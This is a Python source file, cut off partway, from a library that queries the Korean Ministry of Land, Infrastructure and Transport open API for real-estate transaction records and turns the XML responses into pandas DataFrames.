] | null | null | null | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
] | null | null | null | '''
국토교통부 Open API
molit(Ministry of Land, Infrastructure and Transport)
1. Transaction 클래스: 부동산 실거래가 조회
- AptTrade: 아파트매매 실거래자료 조회
- AptTradeDetail: 아파트매매 실거래 상세 자료 조회
- AptRent: 아파트 전월세 자료 조회
- AptOwnership: 아파트 분양권전매 신고 자료 조회
- OffiTrade: 오피스텔 매매 신고 조회
- OffiRent: 오피스텔 전월세 신고 조회
- RHTrade: 연립다세대 매매 실거래자료 조회
- RHRent: 연립다세대 전월세 실거래자료 조회
- DHTrade: 단독/다가구 매매 실거래 조회
- DHRent: 단독/다가구 전월세 자료 조회
- LandTrade: 토지 매매 신고 조회
- BizTrade: 상업업무용 부동산 매매 신고 자료 조회
'''
import pandas as pd
import numpy as np
import datetime
import requests
from bs4 import BeautifulSoup
class Transaction:
def __init__(self, serviceKey):
'''
공공 데이터 포털에서 발급받은 Service Key를 입력받아 초기화합니다.
'''
# Open API 서비스 키 초기화
self.serviceKey = serviceKey
# ServiceKey 유효성 검사
self.urlAptTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptTrade?serviceKey=" + self.serviceKey
self.urlAptTradeDetail = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptTradeDev?serviceKey=" + self.serviceKey
self.urlAptRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcAptRent?serviceKey=" + self.serviceKey
self.urlAptOwnership = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSilvTrade?serviceKey=" + self.serviceKey
self.urlOffiTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcOffiTrade?serviceKey=" + self.serviceKey
self.urlOffiRent = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcOffiRent?serviceKey=" + self.serviceKey
self.urlRHTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcRHTrade?serviceKey=" + self.serviceKey
self.urlRHRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcRHRent?serviceKey=" + self.serviceKey
self.urlDHTrade = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSHTrade?serviceKey=" + self.serviceKey
self.urlDHRent = "http://openapi.molit.go.kr:8081/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcSHRent?serviceKey=" + self.serviceKey
self.urlLandTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcLandTrade?serviceKey=" + self.serviceKey
self.urlBizTrade = "http://openapi.molit.go.kr/OpenAPI_ToolInstallPackage/service/rest/RTMSOBJSvc/getRTMSDataSvcNrgTrade?serviceKey=" + self.serviceKey
# Open API URL Dict
urlDict = {
'아파트매매 실거래자료 조회': self.urlAptTrade,
'아파트매매 실거래 상세 자료 조회': self.urlAptTradeDetail,
'아파트 전월세 자료 조회': self.urlAptRent,
'아파트 분양권전매 신고 자료 조회': self.urlAptOwnership,
'오피스텔 매매 신고 조회': self.urlOffiTrade,
'오피스텔 전월세 신고 조회': self.urlOffiRent,
'연립다세대 매매 실거래자료 조회': self.urlRHTrade,
'연립다세대 전월세 실거래자료 조회': self.urlRHRent,
'단독/다가구 매매 실거래 조회': self.urlDHTrade,
'단독/다가구 전월세 자료 조회': self.urlDHRent,
'토지 매매 신고 조회': self.urlLandTrade,
'상업업무용 부동산 매매 신고 자료 조회': self.urlBizTrade
}
# 서비스 정상 작동 여부 확인
for serviceName, url in urlDict.items():
result = requests.get(url, verify=False)
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
te = xmlsoup.findAll('header')
if te[0].find('resultCode').text =='00':
print(f'>>> {serviceName} 서비스가 정상 작동합니다.')
else:
print(f'>>> {serviceName} 서비스키 미등록 오류입니다.')
# 지역 코드 초기화
# 법정동 코드 출처 : https://code.go.kr
path_code = "https://raw.githubusercontent.com/WooilJeong/PublicDataReader/f14e4de3410cc0f798a83ee5934070d651cbd67b/docs/%EB%B2%95%EC%A0%95%EB%8F%99%EC%BD%94%EB%93%9C%20%EC%A0%84%EC%B2%B4%EC%9E%90%EB%A3%8C.txt"
code = pd.read_csv(path_code, encoding='cp949', sep='\t')
code = code.loc[code['폐지여부']=='존재']
code['법정구코드'] = list(map(lambda a: str(a)[:5], list(code['법정동코드'])))
self.code = code
def CodeFinder(self, name):
'''
국토교통부 실거래가 정보 오픈API는 법정동코드 10자리 중 앞 5자리인 구를 나타내는 지역코드를 사용합니다.
API에 사용할 구 별 코드를 조회하는 메서드이며, 문자열 지역 명을 입력받고, 조회 결과를 Pandas DataFrame형식으로 출력합니다.
'''
result = self.code[self.code['법정동명'].str.contains(name)][['법정동명','법정구코드']]
result.index = range(len(result))
return result
def DataCollector(self, service, LAWD_CD, start_date, end_date):
'''
서비스별 기간별 조회
입력: 서비스별 조회 메서드, 지역코드, 시작월(YYYYmm), 종료월(YYYYmm)
'''
start_date = datetime.datetime.strptime(str(start_date),'%Y%m')
start_date = datetime.datetime.strftime(start_date, '%Y-%m')
end_date = datetime.datetime.strptime(str(end_date), '%Y%m')
end_date = end_date + datetime.timedelta(days=31)
end_date = datetime.datetime.strftime(end_date, '%Y-%m')
ts = pd.date_range(start=start_date, end=end_date, freq='m')
date_list = list(ts.strftime('%Y%m'))
df = pd.DataFrame()
df_sum = pd.DataFrame()
for m in date_list:
print('>>> LAWD_CD :', LAWD_CD, 'DEAL_YMD :', m)
DEAL_YMD = m
df = service(LAWD_CD, DEAL_YMD)
df_sum = pd.concat([df_sum, df])
df_sum.index = range(len(df_sum))
return df_sum
def AptTrade(self, LAWD_CD, DEAL_YMD):
'''
01 아파트매매 실거래자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlAptTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','아파트','지번','년','월','일','건축년도','전용면적','층','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,아파트,지번,년,월,일,건축년도,전용면적,층,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df['아파트'] = df['아파트'].str.strip()
df.index = range(len(df))
# 형 변환
cols = df.columns.drop(['법정동','거래일','아파트','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def AptTradeDetail(self, LAWD_CD, DEAL_YMD):
'''
02 아파트매매 실거래 상세 자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlAptTradeDetail + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['거래금액','건축년도','년','도로명','도로명건물본번호코드',
'도로명건물부번호코드','도로명시군구코드','도로명일련번호코드',
'도로명지상지하코드','도로명코드','법정동','법정동본번코드',
'법정동부번코드','법정동시군구코드','법정동읍면동코드',
'법정동지번코드','아파트','월','일','전용면적','지번',
'지역코드','층']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[거래금액,건축년도,년,도로명,도로명건물본번호코드,도로명건물부번호코드,도로명시군구코드,도로명일련번호코드,
도로명지상지하코드,도로명코드,법정동,법정동본번코드,법정동부번코드,법정동시군구코드,법정동읍면동코드,
법정동지번코드,아파트,월,일,전용면적,지번,지역코드,층]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = [
'지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','거래금액',
'법정동본번코드','법정동부번코드','법정동시군구코드','법정동읍면동코드','법정동지번코드',
'도로명','도로명건물본번호코드','도로명건물부번호코드','도로명시군구코드','도로명일련번호코드',
'도로명지상지하코드','도로명코드'
]
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df['아파트'] = df['아파트'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','아파트','지번','도로명'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def AptRent(self, LAWD_CD, DEAL_YMD):
'''
03 아파트 전월세 자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlAptRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','아파트','지번','년','월','일','건축년도','전용면적','층','보증금액','월세금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,아파트,지번,년,월,일,건축년도,전용면적,층,보증금액,월세금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','아파트','지번','전용면적','층','건축년도','보증금액','월세금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',',''))
df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','지번','아파트'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def AptOwnership(self, LAWD_CD, DEAL_YMD):
'''
04 아파트 분양권전매 신고 자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlAptOwnership + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','구분','년','월','일','전용면적','층','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,시군구,단지,지번,구분,년,월,일,전용면적,층,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','구분','전용면적','층','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번','구분'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def OffiTrade(self, LAWD_CD, DEAL_YMD):
'''
05 오피스텔 매매 신고 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlOffiTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','년','월','일','전용면적','층','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,시군구,단지,지번,년,월,일,전용면적,층,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','전용면적','층','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def OffiRent(self, LAWD_CD, DEAL_YMD):
'''
06 오피스텔 전월세 신고 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlOffiRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','단지','지번','년','월','일','전용면적','층','보증금','월세']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,시군구,단지,지번,년,월,일,전용면적,층,보증금,월세]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','단지','지번','전용면적','층','보증금','월세']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금'] = pd.to_numeric(df['보증금'].str.replace(',',''))
df['월세'] = pd.to_numeric(df['월세'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','시군구','단지','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def RHTrade(self, LAWD_CD, DEAL_YMD):
'''
07 연립다세대 매매 실거래자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlRHTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','연립다세대','지번','년','월','일','전용면적','건축년도','층','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,연립다세대,지번,년,월,일,전용면적,건축년도,층,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','연립다세대','지번','전용면적','건축년도','층','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','연립다세대','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def RHRent(self, LAWD_CD, DEAL_YMD):
'''
08 연립다세대 전월세 실거래자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlRHRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','연립다세대','지번','년','월','일','전용면적','건축년도','층','보증금액','월세금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,연립다세대,지번,년,월,일,전용면적,건축년도,층,보증금액,월세금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','연립다세대','지번','전용면적','건축년도','층','보증금액','월세금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',',''))
df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','연립다세대','지번'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def DHTrade(self, LAWD_CD, DEAL_YMD):
'''
09 단독/다가구 매매 실거래 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlDHTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','주택유형','년','월','일','대지면적','연면적','건축년도','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,주택유형,년,월,일,대지면적,연면적,건축년도,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','주택유형','대지면적','연면적','건축년도','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일','주택유형'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def DHRent(self, LAWD_CD, DEAL_YMD):
'''
10 단독/다가구 전월세 자료 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlDHRent + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','년','월','일','계약면적','보증금액','월세금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,년,월,일,계약면적,보증금액,월세금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','계약면적','보증금액','월세금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['보증금액'] = pd.to_numeric(df['보증금액'].str.replace(',',''))
df['월세금액'] = pd.to_numeric(df['월세금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
cols = df.columns.drop(['법정동','거래일'])
df[cols] = df[cols].apply(pd.to_numeric, errors='coerce')
return df
except:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("header")
# 정상 요청시 에러 발생 -> Python 코드 에러
if te[0].find('resultCode').text == "00":
print(">>> Python Logic Error. e-mail : wooil@kakao.com")
# Open API 서비스 제공처 오류
else:
print(">>> Open API Error: {}".format(te[0].find['resultMsg']))
pass
def LandTrade(self, LAWD_CD, DEAL_YMD):
'''
11 토지 매매 신고 조회
입력: 지역코드(법정동코드 5자리), 계약월(YYYYmm)
'''
# URL
url_1 = self.urlLandTrade + '&LAWD_CD=' + str(LAWD_CD)
url_2 = "&DEAL_YMD=" + str(DEAL_YMD)
url_3 = "&numOfRows=99999"
url = url_1 + url_2 + url_3
try:
# Get raw data
result = requests.get(url, verify=False)
# Parsing
xmlsoup = BeautifulSoup(result.text, 'lxml-xml')
# Filtering
te = xmlsoup.findAll("item")
# Creating Pandas Data Frame
df = pd.DataFrame()
variables = ['법정동','지역코드','시군구','용도지역','지목','년','월','일','지분거래구분','거래면적','거래금액']
for t in te:
for variable in variables:
try :
globals()[variable] = t.find(variable).text
except :
globals()[variable] = np.nan
data = pd.DataFrame(
[[법정동,지역코드,시군구,용도지역,지목,년,월,일,지분거래구분,거래면적,거래금액]],
columns = variables
)
df = pd.concat([df, data])
# Set Columns
colNames = ['지역코드','법정동','거래일','시군구','용도지역','지목','지분거래구분','거래면적','거래금액']
# Feature Engineering
try:
if len(df['년']!=0) & len(df['월']!=0) & len(df['일']!=0):
df['거래일'] = df['년'] + '-' + df['월'] + '-' + df['일']
df['거래일'] = pd.to_datetime(df['거래일'])
df['거래금액'] = pd.to_numeric(df['거래금액'].str.replace(',',''))
except:
df = pd.DataFrame(columns=colNames)
print("조회할 자료가 없습니다.")
# Arange Columns
df = df[colNames]
df = df.sort_values(['법정동','거래일'])
df['법정동'] = df['법정동'].str.strip()
df.index = range(len(df))
# 숫자형 변환
